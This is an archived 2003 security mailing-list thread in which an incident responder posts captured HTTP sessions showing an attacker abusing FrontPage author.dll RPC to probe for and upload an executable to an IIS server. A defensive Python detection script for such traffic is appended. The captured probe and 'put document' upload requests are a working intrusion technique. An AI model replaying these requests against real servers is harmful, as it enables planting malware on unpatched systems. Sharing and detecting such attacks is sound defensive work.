Re: frontpage extensions; backdoor or initial compromise?

From: Eric Kimminau (root_at_kimminau.org)
Date: 07/03/03

  • Next message: Jordan Wiens: "RE: frontpage extensions; backdoor or initial compromise?"
    Date: Thu, 3 Jul 2003 14:05:18 -0400 (EDT)
    To: Jordan Wiens <jwiens@nersp.nerdc.ufl.edu>
    
    

    I'm assuming it was WebDAV, right? Get your Windows boxes patched and
    keep close tabs on them on Sunday.

    Eric.

    On Wed, 2 Jul 2003, Jordan Wiens wrote:

    > Date: Wed, 2 Jul 2003 13:08:43 -0400 (EDT)
    > From: Jordan Wiens <jwiens@nersp.nerdc.ufl.edu>
    > To: incidents@securityfocus.com
    > Subject: frontpage extensions; backdoor or initial compromise?
    >
    > We had a recent compromise that our IDS did not detect, however, it did
    > detect subsequent backdoor activity and a few other packets afterwards
    > that alerted us to the compromise. Upon closer investigation of the
    > activity, some of the additional information logged showed some frontpage
    > extensions being used in an interesting way. Anyone else seen this?
    >
    > Since we were unable to determine the initial compromise method, I'm
    > trying to figure out if this was purely used as a backdoor, or might also
    > have been the same method as the initial compromise.
    >
    > Some additional background info: the svchost.exe is a renamed Serv-U FTP
    > daemon process that was loaded into the server along with a few other,
    > 'normal' backdoor tools.
    >
    > --
    > Jordan Wiens
    > UF Network Incident Response Team
    > (352)392-2061
    >
    > ATTACK:
    > ---------------
    > POST /_vti_bin/_vti_aut/author.dll HTTP/1.1
    > Date: Tue, 01 Jul 2003 20:33:10 GMT
    > MIME-Version: 1.0
    > User-Agent: MSFrontPage/4.0
    > Host: aaa.bbb.ccc.ddd
    > Accept: auth/sicily
    > Content-Length: 112
    > Content-Type: application/x-www-form-urlencoded
    > X-Vermeer-Content-Type: application/x-www-form-urlencoded
    > Connection: Keep-Alive
    > Cache-Control: no-cache
    >
    > method=getDocsMetaInfo%3a4%2e0%2e2%2e4715&url%5flist=%5bsvchost%2eexe%5d&listHiddenDocs=false&listLinkInfo=true
    >
    >
    > SERVER RESPONSE:
    > ---------------
    > HTTP/1.1 100 Continue
    > Server: Microsoft-IIS/5.0
    > Date: Tue, 01 Jul 2003 20:30:02 GMT
    >
    > HTTP/1.1 200 OK
    > Server: Microsoft-IIS/5.0
    > Date: Tue, 01 Jul 2003 20:30:02 GMT
    > Connection: close
    > Content-type: application/x-vermeer-rpc
    > X-FrontPage-User-Name: IUSR_MACHINE
    >
    > <html><head><title>vermeer RPC packet</title></head>
    > <body>
    > <p>method=getDocsMetaInfo:4.0.2.4715
    > <p>document_list=
    > <ul>
    > </ul>
    > <p>failedUrls=
    > <ul>
    > <li>svchost.exe
    > </ul>
    > </body>
    > </html>
    >
    >
    >
    > Additional session....
    >
    > ATTACKER:
    > ---------------
    > POST /_vti_bin/_vti_aut/author.dll HTTP/1.1
    > Date: Tue, 01 Jul 2003 20:33:29 GMT
    > MIME-Version: 1.0
    > User-Agent: MSFrontPage/4.0
    > Host: aaa.bbb.ccc.ddd
    > Accept: auth/sicily
    > Content-Length: 2142969
    > Content-Type: application/x-vermeer-urlencoded
    > X-Vermeer-Content-Type: application/x-vermeer-urlencoded
    > Connection: Keep-Alive
    > Cache-Control: no-cache
    >
    >
    > SERVER:
    > ---------------
    > HTTP/1.1 100 Continue
    > Server: Microsoft-IIS/5.0
    > Date: Tue, 01 Jul 2003 20:30:21 GMT
    >
    > ATTACKER:
    > ---------------
    > method=put+document%3a4%2e0%2e2%2e4715&service%5fname=&document=%5bdocument%5fname%3dsvss%2eexe%3bmeta%5finfo%3d%5bvti%5fmodifiedby%3bSW%7cAdministrator%3bvti%5fauthor%3bSW%7cAdministrator%5d%5d&put%5foption=edit&comment=&keep%5fchecked%5fout=false
    > MZP@!L!This program must be run under Win32
    > $7PELW] < @p! > xp pK.text `.data@.tls*@.rdata,@P.idata
    > .@@.edataF@@.rsrcxH@@.relocp @Pfb:C++HOOK,[[#[RjYZp/jYh[j3'[jg3['[`PS
    > htM=[s
    > .
    > . Additional raw data.
    > .
    >
    > ----------------------------------------------------------------------------
    > Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the
    > world's premier technical IT security event! 10 tracks, 15 training sessions,
    > 1,800 delegates from 30 nations including all of the top experts, from CSO's to
    > "underground" security specialists. See for yourself what the buzz is about!
    > Early-bird registration ends July 3. This event will sell out. www.blackhat.com
    > ----------------------------------------------------------------------------
    >
    >

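The two captured sessions above are a FrontPage Server Extensions RPC probe (getDocsMetaInfo asking whether svchost.exe exists) followed by a "put document" upload of svss.exe, and the server's reply carries X-FrontPage-User-Name: IUSR_MACHINE, i.e. the authoring call was served under the IIS anonymous account. The following detection script is an added example and not part of the original post or anything from the list members: it decodes the percent-encoded vermeer RPC form that starts each author.dll POST, flags probes for and uploads of executables, notes when the uploaded payload begins with an MZ header, and flags authoring responses answered as an IUSR_* account. The sample requests and response are constructed from the shapes shown in the capture (the file bytes are shortened), and the executable-extension list is the example's own choice.

```python
"""Detect FrontPage Server Extensions author.dll abuse in raw HTTP captures.

Added example, not code from the original thread. Samples below are constructed
from the shapes of the captured sessions (the uploaded file bytes are cut short).
"""
import re
from urllib.parse import parse_qs

AUTHOR_DLL = "/_vti_bin/_vti_aut/author.dll"
# Extensions treated as executable content: this list is the example's own choice.
EXEC_EXT = (".exe", ".dll", ".com", ".bat", ".cmd", ".scr", ".pif")

# Constructed samples modelled on the capture in the thread.
SAMPLE_PROBE = (
    "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1\r\n"
    "User-Agent: MSFrontPage/4.0\r\n"
    "Host: aaa.bbb.ccc.ddd\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "method=getDocsMetaInfo%3a4%2e0%2e2%2e4715&url%5flist=%5bsvchost%2eexe%5d"
    "&listHiddenDocs=false&listLinkInfo=true"
)
SAMPLE_UPLOAD = (
    "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1\r\n"
    "User-Agent: MSFrontPage/4.0\r\n"
    "Host: aaa.bbb.ccc.ddd\r\n"
    "Content-Type: application/x-vermeer-urlencoded\r\n"
    "\r\n"
    "method=put+document%3a4%2e0%2e2%2e4715&service%5fname=&document=%5b"
    "document%5fname%3dsvss%2eexe%3bmeta%5finfo%3d%5bvti%5fmodifiedby%3bSW%7c"
    "Administrator%3bvti%5fauthor%3bSW%7cAdministrator%5d%5d&put%5foption=edit"
    "&comment=&keep%5fchecked%5fout=false\r\n"
    "MZP@!L!This program must be run under Win32"  # start of the PE image
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/5.0\r\n"
    "Content-type: application/x-vermeer-rpc\r\n"
    "X-FrontPage-User-Name: IUSR_MACHINE\r\n"
    "\r\n"
    "<html><head><title>vermeer RPC packet</title></head></html>"
)


def split_http(message):
    """Return (start line, headers with lower-cased names, body) of a raw HTTP message."""
    head, _, body = message.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def parse_rpc(body):
    """Decode the vermeer RPC form at the start of the body.

    For 'put document' the form is the first line and the raw file follows it.
    Percent-decoding is the same for x-www-form-urlencoded and x-vermeer-urlencoded.
    """
    form, _, payload = body.partition("\n")
    params = {k: v[0] for k, v in parse_qs(form.rstrip("\r"), keep_blank_values=True).items()}
    method = params.get("method", "").split(":", 1)[0]  # drop the ':4.0.2.4715' version suffix
    return method, params, payload


def list_items(value):
    """'[a;b]' -> ['a', 'b'] for the bracketed list syntax used by url_list."""
    return [x for x in value.strip("[]").split(";") if x]


def analyze_request(message):
    """Return findings for one HTTP request; empty list if nothing notable."""
    start, headers, body = split_http(message)
    parts = start.split()
    if len(parts) < 2 or not parts[1].lower().endswith(AUTHOR_DLL):
        return []
    method, params, payload = parse_rpc(body)
    findings = [f"author.dll RPC: method={method!r} ua={headers.get('user-agent', '?')}"]
    if method == "getDocsMetaInfo":
        execs = [t for t in list_items(params.get("url_list", "")) if t.lower().endswith(EXEC_EXT)]
        if execs:
            findings.append(f"probe for executable(s) on server: {execs}")
    elif method == "put document":
        m = re.search(r"document_name=([^;\]]+)", params.get("document", ""))
        name = m.group(1) if m else "?"
        if name.lower().endswith(EXEC_EXT):
            findings.append(f"executable upload via put document: {name}")
        if payload.startswith("MZ"):  # DOS/PE header magic
            findings.append("uploaded payload begins with an MZ (DOS/PE) header")
    return findings


def analyze_response(message):
    """Flag an authoring RPC reply served under an IIS anonymous (IUSR_*) account."""
    _, headers, _ = split_http(message)
    user = headers.get("x-frontpage-user-name", "")
    if headers.get("content-type", "").lower() == "application/x-vermeer-rpc" and user.upper().startswith("IUSR_"):
        return [f"authoring RPC served as anonymous IIS account {user}"]
    return []


if __name__ == "__main__":
    for sample in (SAMPLE_PROBE, SAMPLE_UPLOAD):
        for finding in analyze_request(sample):
            print("REQ ", finding)
    for finding in analyze_response(SAMPLE_RESPONSE):
        print("RESP", finding)
```

Run against a proxy or IDS capture, the interesting signal is the combination: a write-method RPC naming an executable, a body that starts with an MZ header right after the form, and a reply that names IUSR_ rather than an authenticated author.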

